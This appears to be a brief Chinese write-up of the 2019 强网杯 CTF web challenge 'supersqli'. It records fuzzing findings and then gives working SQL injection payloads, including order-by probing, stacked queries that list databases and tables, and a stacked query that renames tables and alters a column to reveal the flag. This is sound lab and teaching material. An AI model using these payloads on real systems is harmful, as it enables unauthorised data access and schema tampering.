CTF-Web-强网杯 2019-随便注

题目链接

题目链接-supersqli

FUZZ测试

fuzz出,order by测出数据库查询列数2列,注释符号#,select|update|delete|drop|insert|where|被过滤,尝试堆叠注入

1’

1'order by 2 #

1'order by 3 #

堆叠注入

1';show databases;#
1';show tables;#
1';show columns from  words;#




测试判断数据库查询语句为

select * from words where id=$_inject;

页面显示的‘haha’为数据库表中id=1的值,现在可以将存有flag值的表名称改为words,并将列名flag改为id,查询语句如下,最后用or 1=1# 查出flag

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#
1'or 1=1#

原文地址:https://www.cnblogs.com/renhaoblog/p/13983807.html